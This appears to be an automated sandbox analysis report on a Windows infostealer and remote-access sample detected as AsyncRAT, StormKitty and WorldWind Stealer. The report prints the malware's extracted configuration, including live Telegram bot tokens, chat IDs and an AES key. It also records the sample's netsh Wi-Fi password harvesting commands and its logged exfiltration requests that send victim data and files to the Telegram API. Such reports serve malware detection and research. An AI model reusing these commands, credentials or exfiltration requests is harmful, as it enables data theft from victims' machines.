Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample Name:file.exe
Analysis ID:893767
MD5:c03a7cedc3314e6f0dc26431503dd035
SHA1:3a4c09c8c54639a839ce19f49e9018e53ac6b2b8
SHA256:719169d99a13f958de7a3f58d34ac4262cc90924eea256c782ed0b82de6adc0a
Tags:NETAsyncRATexeMSIL
Infos:

Detection

AsyncRAT, StormKitty, WorldWind Stealer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected Telegram Recon
Malicious sample detected (through community Yara rule)
Sigma detected: Capture Wi-Fi password
Yara detected Telegram RAT
Antivirus / Scanner detection for submitted sample
Yara detected StormKitty Stealer
Antivirus detection for URL or domain
Yara detected WorldWind Stealer
Yara detected AsyncRAT
Uses netsh to modify the Windows network and firewall settings
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Contains functionality to log keystrokes (.Net Source)
Uses the Telegram API (likely for C&C communication)
Tries to harvest and steal WLAN passwords
Machine Learning detection for sample
Modifies existing user documents (likely ransomware behavior)
May check the online IP address of the machine
.NET source code contains potential unpacker
Yara detected Generic Downloader
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Found many strings related to Crypto-Wallets (likely being stolen)
Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)
Tries to harvest and steal browser information (history, passwords, etc)
Queries the volume information (name, serial number etc) of a device
Yara signature match
May sleep (evasive loops) to hinder dynamic analysis
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Yara detected Credential Stealer
JA3 SSL client fingerprint seen in connection with other malware
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Queries information about the installed CPU (vendor, model number etc)
Queries the product ID of Windows
AV process strings found (often used to terminate AV products)
Sample file is different than original file name gathered from version info
Binary contains a suspicious time stamp
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Creates a process in suspended mode (likely to inject code)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64
  • file.exe (PID: 5740 cmdline: C:\Users\user\Desktop\file.exe MD5: C03A7CEDC3314E6F0DC26431503DD035)
    • cmd.exe (PID: 7128 cmdline: "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 7136 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • chcp.com (PID: 812 cmdline: chcp 65001 MD5: 561054CF9C4B2897E80D7E7D9027FED9)
      • netsh.exe (PID: 3872 cmdline: netsh wlan show profile MD5: A0AA3322BB46BBFC36AB9DC1DBBBB807)
      • findstr.exe (PID: 1424 cmdline: findstr All MD5: 8B534A7FC0630DE41BB1F98C882C19EC)
    • cmd.exe (PID: 2752 cmdline: "cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 5268 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • chcp.com (PID: 5928 cmdline: chcp 65001 MD5: 561054CF9C4B2897E80D7E7D9027FED9)
      • netsh.exe (PID: 5916 cmdline: netsh wlan show networks mode=bssid MD5: A0AA3322BB46BBFC36AB9DC1DBBBB807)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
AsyncRATAsyncRAT is a Remote Access Tool (RAT) designed to remotely monitor and control other computers through a secure encrypted connection. It is an open source remote administration tool, however, it could also be used maliciously because it provides functionality such as keylogger, remote desktop control, and many other functions that may cause harm to the victims computer. In addition, AsyncRAT can be delivered via various methods such as spear-phishing, malvertising, exploit kit and other techniques.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.asyncrat
NameDescriptionAttributionBlogpost URLsLink
Cameleon, StormKittyPWC describes this malware as a backdoor, capable of file management, upload and download of files, and execution of commands.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cameleon

Malware Configuration

Threatname: AsyncRAT

{"Server": "127.0.0.1", "Ports": "6606,7707,8808", "Telegram C2": "https://api.telegram.org/bot6154715708:AAFzLcpt7CU7GhHYDqN7AZi1rev_GZv5Qe4/sendMessage?chat_id=1165040754", "Version": "", "AES_key": "4qsKtpuqPkY57c6vW77AyPmuPai9cZ4h", "Mutex": "AsyncMutex_6SI8OkPnk", "Certificate": "MIIE9jCCAt6gAwIBAgIQAKQXqY8ZdB/modqi69mWGTANBgkqhkiG9w0BAQ0FADAcMRowGAYDVQQDDBFXb3JsZFdpbmQgU3RlYWxlcjAgFw0yMTA3MTMwNDUxMDZaGA85OTk5MTIzMTIzNTk1OVowHDEaMBgGA1UEAwwRV29ybGRXaW5kIFN0ZWFsZXIwggIiMA0GCSqGSIb3DQEBAQUAA4ICDwAwggIKAoICAQCnRXYoxuLqqgXdcvIAYWb9DuVRl5ZpdpPfoIgmb7Y9A9AuiddKNm4is8EvIlEh98bQD4OBaK0EGWuj7WuAcQPCCGuzHpDqFZbXR7iRqVn6TiLRsO0LCMB4ta4XLQ4JdTFXvnQHcGiUxHddH70T/2P2bBVY0W+PVJDzG3XUWHpYb4PVv7qaQr/DalR3qyyd5otzE1kIjJLCOCyI/9ntIcD/PbMTKVnCP4fzbnkNB+xy0PmQmx3WRWEF5q72TdgaKrCbOpR2C/+rfGIoPC6Ze6dqWO3bQLGt6jpCO8A4CtAaAYmiw1vHUOfP54BgI9ls1TjYO3Rn4R1jmhWBGV2pT5chrglgSxMzPhrxFTQljG78RlPCJmyagJbtnPL3AlV34sQggcbf+80FVeyechm/xrMTSWXrJQ+xek1HRJBDFoCJyUR7SuIUelOW24TU+rwl/2dcALLZXpjYu3/zvJjH4iaJXRCt7oWhfzIFG1bHBFr78kV9VP0H+ZNVb129eUr14F/uubAoIPAz2EHG/CXBZv9GkFuzw0NgsI1eP7AznCLdT+z91M+yB7vWtvclwQ5k6MxWDPOraG5JMjUHvKI6zvyZ4IQ2a7bUENDghxLAqIxgo7zfZMdrjbRxBlqW14oki6Um7GpGKEZ0s2Ip6K2yJHBLpbVxOYjyzrxohMguh+qvgQIDAQABozIwMDAdBgNVHQ4EFgQUmTejTtK6on20N0YJez5sAZdMe/kwDwYDVR0TAQH/BAUwAwEB/zANBgkqhkiG9w0BAQ0FAAOCAgEAhauA0si7sHBd06DSGJgP5vJxL2daW30wR5XbAJd0HWj3QWfl7w27iyZ5AqBT4B0ojLNuMUG8mUOvpcoq0m80qUX7TIKUULKvb+i7uGGEDxk3W5F3es/CTUUWO0QlseWx9QEYziGlp6f3tkP4PTGSL0DywVRSa8l6f/B5kqwnW17CbQfJZ8vmy5snpDO/avgYssUnQtKQPhos7GbokNHps/bxEIRfLeprzQox20dw4RV59LcorjP5QV7Vc6FuYmhzC0nfRetTHckyxg66O3ekfTVs87MLiDV0ipQ+D/6k3g6DRuTdd4V2khjtI56ujSqTQ2PueNQXPu8y2fdsT2Rd1LcfxMS1xKAhSwhHfyy0I3JwzPG1D+sm3QNJEOoJviSNn5fYOFpY+mSEkFNMMeEbwOFdHxWbkiJk/Z8VwdH5I52tkHU3sRQMuZHtcKUc/SIt5Ivv6gtuEZQdm1GE6KUdiRB95s8JVGNlCcHX5bXbScu4eKCRQn3Cl+m5KR4EzI6hVP/iDRhVKj7Dn/blOHLzhNS5vW4X085dTP+1TBL8CHpQpiA3t8LfqfV1b/+WahOd3jNBNTXXfe/AQSjErgctLMdmOBpUQaJLOlcDcKGxWQdOo102nxg8Y/kFDARccywugoQxuIZpMYq74tjnJlJZ9kqR/LPrjmvx4v+0XFsaCPE=", "ServerSignature": "kKsugsQu3eo73x+SF5NyNjFkKDoXYn4ibGkrv9d0mkNnkKX+Xs41dOvJxwMgSJjBJAXj+kNdHADhM/iRYmcGc/NxyqBwsaC5K/dYnwy2d0Ql9//q5zMO7YVpgN61hVy0b2dt1IWghvqeKizPfiHDIfvkrxBpdjwYWygmjx9iN8JKRpmULW8AoVx5k7uaSUgaJDjALDI95VCmGJj4aN7IcYpgKR7F735u3zuLyxhSB/T0rlwa6Q1uWmhi6PDVAJAknWxbZJ0UpgeZL8ATQ9pyhbvrRO9hCMPsZs6zqfG1+puICezW6w7hg9qYVow1+at019AO6DMG8zJqefgF9GOCvc6kpUtbexucO8kXKrznL0U3dd6WjF7dXA2dokbFCLdeyfg6GQ8MEll6kOsJhWZSpZXGhMOfsflOdm1Ksw6RtA/3/KYxFePq5WddQ3TLf3bsWi+cD7cDlFcqfKoUrYZ/ndHwQQKvpUlvYm4SEiK3/haqxHO829zmaG3rIot/vlWFX+5YwfQPnDNQz3uR+CsGPDbArZd+7EkdQoCDxBVsUF5gv0IaNvTH9yMloFidO9YNY6us2DEHJTqoHZ174gAbISlVsA3kqmU57mmKbbVbMtv4W0k5sfJjHqjcLElY2q++S80yA2JhU5EUGvYOK95r37xzEXuITa92/4UqIGNLMM4=", "Group": "Default"}

Threatname: Telegram RAT

{"C2 url": "https://api.telegram.org/bot6154715708:AAFzLcpt7CU7GhHYDqN7AZi1rev_GZv5Qe4/sendMessage", "Telegram Stream": [{"ok": true, "result": {"message_id": 3918, "from": {"id": 6154715708, "is_bot": true, "first_name": "oRG", "username": "XChannX_bot"}, "chat": {"id": 1165040754, "first_name": "\u0196\u1ee9\u010d\u1ecb\u1e1f\u0454\u04f7", "last_name": "\uff7f\u012f\u028d\u1e4d\u1e5d\u1e45\u0268\u1e45\u0262\u0455\u1e6f\u1ea3\u1e5d", "username": "Lucifer7005", "type": "private"}, "date": 1687548098, "text": "\ud83d\udcc1 Uploading Log Folders..."}}]}

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
file.exeJoeSecurity_WorldWindStealerYara detected WorldWind StealerJoe Security
    file.exeJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
      file.exeJoeSecurity_AsyncRATYara detected AsyncRATJoe Security
        file.exeJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
          file.exeJoeSecurity_StormKittyYara detected StormKitty StealerJoe Security
            Click to see the 7 entries

            PCAP (Network Traffic)

            SourceRuleDescriptionAuthorStrings
            sslproxydump.pcapJoeSecurity_WorldWindStealerYara detected WorldWind StealerJoe Security

              Memory Dumps

              SourceRuleDescriptionAuthorStrings
              00000000.00000002.741988818.0000000003328000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_WorldWindStealerYara detected WorldWind StealerJoe Security
                00000000.00000000.472435711.0000000000EE2000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_WorldWindStealerYara detected WorldWind StealerJoe Security
                  00000000.00000000.472435711.0000000000EE2000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
                    00000000.00000000.472435711.0000000000EE2000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_AsyncRATYara detected AsyncRATJoe Security
                      00000000.00000000.472435711.0000000000EE2000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_StormKittyYara detected StormKitty StealerJoe Security
                        Click to see the 15 entries

                        Unpacked PEs

                        SourceRuleDescriptionAuthorStrings
                        0.0.file.exe.ee0000.0.unpackJoeSecurity_WorldWindStealerYara detected WorldWind StealerJoe Security
                          0.0.file.exe.ee0000.0.unpackJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
                            0.0.file.exe.ee0000.0.unpackJoeSecurity_AsyncRATYara detected AsyncRATJoe Security
                              0.0.file.exe.ee0000.0.unpackJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
                                0.0.file.exe.ee0000.0.unpackJoeSecurity_StormKittyYara detected StormKitty StealerJoe Security
                                  Click to see the 6 entries

                                  Sigma Signatures

                                  Stealing of Sensitive Information

                                  barindex
                                  Sigma detected: Capture Wi-Fi password
                                  Source: Process startedAuthor: Joe Security: Data: Command: "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All, CommandLine: "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: C:\Users\user\Desktop\file.exe, ParentImage: C:\Users\user\Desktop\file.exe, ParentProcessId: 5740, ParentProcessName: file.exe, ProcessCommandLine: "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All, ProcessId: 7128, ProcessName: cmd.exe

                                  Snort Signatures

                                  No Snort rule has matched

                                  Joe Sandbox Signatures

                                  Click to jump to signature section

                                  Show All Signature Results

                                  AV Detection

                                  barindex
                                  Found malware configuration
                                  Source: file.exeMalware Configuration Extractor: AsyncRAT {"Server": "127.0.0.1", "Ports": "6606,7707,8808", "Telegram C2": "https://api.telegram.org/bot6154715708:AAFzLcpt7CU7GhHYDqN7AZi1rev_GZv5Qe4/sendMessage?chat_id=1165040754", "Version": "", "AES_key": "4qsKtpuqPkY57c6vW77AyPmuPai9cZ4h", "Mutex": "AsyncMutex_6SI8OkPnk", "Certificate": "MIIE9jCCAt6gAwIBAgIQAKQXqY8ZdB/modqi69mWGTANBgkqhkiG9w0BAQ0FADAcMRowGAYDVQQDDBFXb3JsZFdpbmQgU3RlYWxlcjAgFw0yMTA3MTMwNDUxMDZaGA85OTk5MTIzMTIzNTk1OVowHDEaMBgGA1UEAwwRV29ybGRXaW5kIFN0ZWFsZXIwggIiMA0GCSqGSIb3DQEBAQUAA4ICDwAwggIKAoICAQCnRXYoxuLqqgXdcvIAYWb9DuVRl5ZpdpPfoIgmb7Y9A9AuiddKNm4is8EvIlEh98bQD4OBaK0EGWuj7WuAcQPCCGuzHpDqFZbXR7iRqVn6TiLRsO0LCMB4ta4XLQ4JdTFXvnQHcGiUxHddH70T/2P2bBVY0W+PVJDzG3XUWHpYb4PVv7qaQr/DalR3qyyd5otzE1kIjJLCOCyI/9ntIcD/PbMTKVnCP4fzbnkNB+xy0PmQmx3WRWEF5q72TdgaKrCbOpR2C/+rfGIoPC6Ze6dqWO3bQLGt6jpCO8A4CtAaAYmiw1vHUOfP54BgI9ls1TjYO3Rn4R1jmhWBGV2pT5chrglgSxMzPhrxFTQljG78RlPCJmyagJbtnPL3AlV34sQggcbf+80FVeyechm/xrMTSWXrJQ+xek1HRJBDFoCJyUR7SuIUelOW24TU+rwl/2dcALLZXpjYu3/zvJjH4iaJXRCt7oWhfzIFG1bHBFr78kV9VP0H+ZNVb129eUr14F/uubAoIPAz2EHG/CXBZv9GkFuzw0NgsI1eP7AznCLdT+z91M+yB7vWtvclwQ5k6MxWDPOraG5JMjUHvKI6zvyZ4IQ2a7bUENDghxLAqIxgo7zfZMdrjbRxBlqW14oki6Um7GpGKEZ0s2Ip6K2yJHBLpbVxOYjyzrxohMguh+qvgQIDAQABozIwMDAdBgNVHQ4EFgQUmTejTtK6on20N0YJez5sAZdMe/kwDwYDVR0TAQH/BAUwAwEB/zANBgkqhkiG9w0BAQ0FAAOCAgEAhauA0si7sHBd06DSGJgP5vJxL2daW30wR5XbAJd0HWj3QWfl7w27iyZ5AqBT4B0ojLNuMUG8mUOvpcoq0m80qUX7TIKUULKvb+i7uGGEDxk3W5F3es/CTUUWO0QlseWx9QEYziGlp6f3tkP4PTGSL0DywVRSa8l6f/B5kqwnW17CbQfJZ8vmy5snpDO/avgYssUnQtKQPhos7GbokNHps/bxEIRfLeprzQox20dw4RV59LcorjP5QV7Vc6FuYmhzC0nfRetTHckyxg66O3ekfTVs87MLiDV0ipQ+D/6k3g6DRuTdd4V2khjtI56ujSqTQ2PueNQXPu8y2fdsT2Rd1LcfxMS1xKAhSwhHfyy0I3JwzPG1D+sm3QNJEOoJviSNn5fYOFpY+mSEkFNMMeEbwOFdHxWbkiJk/Z8VwdH5I52tkHU3sRQMuZHtcKUc/SIt5Ivv6gtuEZQdm1GE6KUdiRB95s8JVGNlCcHX5bXbScu4eKCRQn3Cl+m5KR4EzI6hVP/iDRhVKj7Dn/blOHLzhNS5vW4X085dTP+1TBL8CHpQpiA3t8LfqfV1b/+WahOd3jNBNTXXfe/AQSjErgctLMdmOBpUQaJLOlcDcKGxWQdOo102nxg8Y/kFDARccywugoQxuIZpMYq74tjnJlJZ9kqR/LPrjmvx4v+0XFsaCPE=", "ServerSignature": "kKsugsQu3eo73x+SF5NyNjFkKDoXYn4ibGkrv9d0mkNnkKX+Xs41dOvJxwMgSJjBJAXj+kNdHADhM/iRYmcGc/NxyqBwsaC5K/dYnwy2d0Ql9//q5zMO7YVpgN61hVy0b2dt1IWghvqeKizPfiHDIfvkrxBpdjwYWygmjx9iN8JKRpmULW8AoVx5k7uaSUgaJDjALDI95VCmGJj4aN7IcYpgKR7F735u3zuLyxhSB/T0rlwa6Q1uWmhi6PDVAJAknWxbZJ0UpgeZL8ATQ9pyhbvrRO9hCMPsZs6zqfG1+puICezW6w7hg9qYVow1+at019AO6DMG8zJqefgF9GOCvc6kpUtbexucO8kXKrznL0U3dd6WjF7dXA2dokbFCLdeyfg6GQ8MEll6kOsJhWZSpZXGhMOfsflOdm1Ksw6RtA/3/KYxFePq5WddQ3TLf3bsWi+cD7cDlFcqfKoUrYZ/ndHwQQKvpUlvYm4SEiK3/haqxHO829zmaG3rIot/vlWFX+5YwfQPnDNQz3uR+CsGPDbArZd+7EkdQoCDxBVsUF5gv0IaNvTH9yMloFidO9YNY6us2DEHJTqoHZ174gAbISlVsA3kqmU57mmKbbVbMtv4W0k5sfJjHqjcLElY2q++S80yA2JhU5EUGvYOK95r37xzEXuITa92/4UqIGNLMM4=", "Group": "Default"}
                                  Source: file.exe.5740.0.memstrminMalware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot6154715708:AAFzLcpt7CU7GhHYDqN7AZi1rev_GZv5Qe4/sendMessage", "Telegram Stream": [{"ok": true, "result": {"message_id": 3918, "from": {"id": 6154715708, "is_bot": true, "first_name": "oRG", "username": "XChannX_bot"}, "chat": {"id": 1165040754, "first_name": "\u0196\u1ee9\u010d\u1ecb\u1e1f\u0454\u04f7", "last_name": "\uff7f\u012f\u028d\u1e4d\u1e5d\u1e45\u0268\u1e45\u0262\u0455\u1e6f\u1ea3\u1e5d", "username": "Lucifer7005", "type": "private"}, "date": 1687548098, "text": "\ud83d\udcc1 Uploading Log Folders..."}}]}
                                  Multi AV Scanner detection for submitted file
                                  Source: file.exeVirustotal: Detection: 74%Perma Link
                                  Antivirus / Scanner detection for submitted sample
                                  Source: file.exeAvira: detected
                                  Antivirus detection for URL or domain
                                  Source: https://raw.githubusercontent.com/LimerBoy/StormKitty/master/StormKitty/stub/packages/DotNetZip.1.13Avira URL Cloud: Label: malware
                                  Machine Learning detection for sample
                                  Source: file.exeJoe Sandbox ML: detected
                                  Source: unknownHTTPS traffic detected: 172.67.196.114:443 -> 192.168.2.6:49715 version: TLS 1.2
                                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.6:49716 version: TLS 1.2
                                  Source: file.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                                  Networking

                                  barindex
                                  Uses the Telegram API (likely for C&C communication)
                                  Source: unknownDNS query: name: api.telegram.org
                                  Source: unknownDNS query: name: api.telegram.org
                                  May check the online IP address of the machine
                                  Source: C:\Users\user\Desktop\file.exeDNS query: name: icanhazip.com
                                  Source: C:\Users\user\Desktop\file.exeDNS query: name: icanhazip.com
                                  Yara detected Generic Downloader
                                  Source: Yara matchFile source: file.exe, type: SAMPLE
                                  Source: Yara matchFile source: 0.0.file.exe.ee0000.0.unpack, type: UNPACKEDPE
                                  Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                                  Source: global trafficHTTP traffic detected: GET /geolocation/wifi?v=1.1&bssid=00:0c:29:82:cb:33 HTTP/1.1Host: api.mylnikov.orgConnection: Keep-Alive
                                  Source: global trafficHTTP traffic detected: GET /bot6154715708:AAFzLcpt7CU7GhHYDqN7AZi1rev_GZv5Qe4/sendMessage?chat_id=1165040754&text=%0A%20%20%F0%9F%8C%AA%20*WorldWind%20Stealer%202.0.4%20-%20Results:*%0ADate:%202023-06-23%209:21:17%20PM%0ASystem:%20Windows%2010%20Pro%20(64%20Bit)%0AUsername:%20user%0ACompName:%20116938%0ALanguage:%20%F0%9F%87%BA%F0%9F%87%B8%20en-US%0AAntivirus:%20Windows%20Defender.%0A%0A%20%20%F0%9F%92%BB%20*Hardware:*%0ACPU:%20Intel(R)%20Core(TM)2%20CPU%206600%20@%202.40%20GHz%0AGPU:%20F8HBZTST%0ARAM:%204095MB%0AHWID:%2067C81467FB%0APower:%20NoSystemBattery%20(1%25)%0AScreen:%201280x1024%0A%0A%20%20%F0%9F%93%A1%20*Network:*%20%0AGateway%20IP:%20192.168.2.1%0AInternal%20IP:%20No%20network%20adapters%20with%20an%20IPv4%20address%20in%20the%20system!%0AExternal%20IP:%2084.17.52.5%0ABSSID:%2000:0c:29:82:cb:33%0A%0A%20%20%F0%9F%92%B8%20*Domains%20info:*%0A%20%20%20%E2%88%9F%20%F0%9F%8F%A6%20*Bank%20Logs*%20(No%20data)%0A%20%20%20%E2%88%9F%20%F0%9F%92%B0%20*Crypto%20Logs*%20(No%20data)%0A%20%20%20%E2%88%9F%20%F0%9F%8D%93%20*Freaky%20Logs*%20(No%20data)%0A%0A%20%20%F0%9F%8C%90%20*Logs:*%0A%0A%20%20%F0%9F%97%83%20*Software:*%0A%0A%20%20%F0%9F%A7%AD%20*Device:*%0A%20%20%20%E2%88%9F%20%F0%9F%97%9D%20Windows%20product%20key%0A%20%20%20%E2%88%9F%20%F0%9F%8C%83%20Desktop%20screenshot%0A%0A%20%20%F0%9F%93%84%20*File%20Grabber:*%0A%20%20%20%E2%88%9F%20%F0%9F%93%82%20Database%20files:%209%0A%20%20%20%E2%88%9F%20%F0%9F%93%82%20Documents:%2060%0A%20%20%20%E2%88%9F%20%F0%9F%93%82%20Images:%2040%0A%0A%20%20Contact%20Developer:%20@FlatLineStealer%0A%20%20%20Join%20The%20Telegram%20Channel:%20@CashOutGangTalk&parse_mode=Markdown&disable_web_page_preview=True HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                                  Source: global trafficHTTP traffic detected: GET /bot6154715708:AAFzLcpt7CU7GhHYDqN7AZi1rev_GZv5Qe4/sendMessage?chat_id=1165040754&text=%F0%9F%93%81%20Uploading%20Log%20Folders... HTTP/1.1Host: api.telegram.org
                                  Source: global trafficHTTP traffic detected: POST /bot6154715708:AAFzLcpt7CU7GhHYDqN7AZi1rev_GZv5Qe4/sendDocument?chat_id=1165040754 HTTP/1.1Content-Type: multipart/form-data; boundary="1b2c3db3-4c43-4a40-ba16-8f0a6647d75a"Host: api.telegram.orgContent-Length: 194790Expect: 100-continue
                                  Source: global trafficHTTP traffic detected: POST /bot1119746739:AAGMhvpUjXI4CzIfizRC--VXilxnkJlhaf8/sendDocument?chat_id=1096425866 HTTP/1.1Content-Type: multipart/form-data; boundary="e77a6233-58d8-4287-8763-8e3899d68419"Host: api.telegram.orgContent-Length: 194790Expect: 100-continue
                                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: icanhazip.comConnection: Keep-Alive
                                  Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
                                  Source: Joe Sandbox ViewIP Address: 172.67.196.114 172.67.196.114
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
                                  Source: file.exe, 00000000.00000002.741988818.0000000003393000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.telegram.org
                                  Source: file.exe, 00000000.00000003.527304493.0000000001579000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.741302323.000000000157A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                                  Source: file.exe, 00000000.00000002.745606612.0000000005DFD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsoft.c
                                  Source: file.exe, 00000000.00000002.741988818.00000000032B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://icanhazip.com
                                  Source: file.exe, 00000000.00000002.741988818.00000000032B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://icanhazip.com/
                                  Source: file.exe, 00000000.00000002.741988818.00000000032B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                                  Source: tmp27E2.tmp.dat.0.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                                  Source: file.exe, 00000000.00000002.741988818.00000000032FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.mylnikov.org/geolocation/wifi?v=1.1&bssid=00:0c:29:82:cb:33
                                  Source: file.exe, 00000000.00000002.741988818.00000000032FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.mylnikov.org4
                                  Source: file.exe, 00000000.00000002.741988818.0000000003909000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram
                                  Source: file.exe, 00000000.00000002.741988818.0000000003393000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.741988818.00000000038A3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
                                  Source: file.exeString found in binary or memory: https://api.telegram.org/bot
                                  Source: file.exeString found in binary or memory: https://api.telegram.org/bot1119746739:AAGMhvpUjXI4CzIfizRC--VXilxnkJlhaf8/send
                                  Source: file.exe, 00000000.00000002.741988818.0000000003393000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot1119746739:AAGMhvpUjXI4CzIfizRC--VXilxnkJlhaf8/sendDocument?chat_id=1096
                                  Source: file.exe, 00000000.00000002.741988818.00000000038A3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot6154715708:AAFzLcpt7CU7GhHYDqN7AZi1rev_GZv5Qe4/sendDocument?chat_id=1165
                                  Source: file.exe, 00000000.00000002.741988818.0000000003909000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot6154715708:AAFzLcpt7CU7GhHYDqN7AZi1rev_GZv5Qe4/sendMessage
                                  Source: file.exe, 00000000.00000002.741988818.0000000003328000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot6154715708:AAFzLcpt7CU7GhHYDqN7AZi1rev_GZv5Qe4/sendMessage?chat_id=11650
                                  Source: file.exeString found in binary or memory: https://api.telegram.org/file/bot
                                  Source: file.exe, 00000000.00000002.741988818.0000000003328000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org4
                                  Source: tmp27E2.tmp.dat.0.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                                  Source: tmp27E2.tmp.dat.0.drString found in binary or memory: https://duckduckgo.com/ac/?q=
                                  Source: file.exe, 00000000.00000002.744440505.0000000004329000.00000004.00000800.00020000.00000000.sdmp, tmp2882.tmp.dat.0.dr, tmp27E2.tmp.dat.0.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
                                  Source: tmp27E2.tmp.dat.0.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                                  Source: file.exeString found in binary or memory: https://github.com/LimerBoy/StormKitty
                                  Source: file.exe, 00000000.00000002.741988818.00000000032B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/LimerBoy/StormKittyHn
                                  Source: file.exeString found in binary or memory: https://raw.githubusercontent.com/LimerBoy/StormKitty/master/StormKitty/stub/packages/DotNetZip.1.13
                                  Source: file.exe, 00000000.00000002.744440505.0000000004329000.00000004.00000800.00020000.00000000.sdmp, tmp2882.tmp.dat.0.dr, tmp27E2.tmp.dat.0.drString found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
                                  Source: file.exe, 00000000.00000002.744440505.0000000004329000.00000004.00000800.00020000.00000000.sdmp, tmp2882.tmp.dat.0.dr, tmp27E2.tmp.dat.0.drString found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command=
                                  Source: file.exe, 00000000.00000002.744440505.0000000004329000.00000004.00000800.00020000.00000000.sdmp, tmp2882.tmp.dat.0.dr, tmp27E2.tmp.dat.0.drString found in binary or memory: https://search.yahoo.com?fr=crmas_sfp
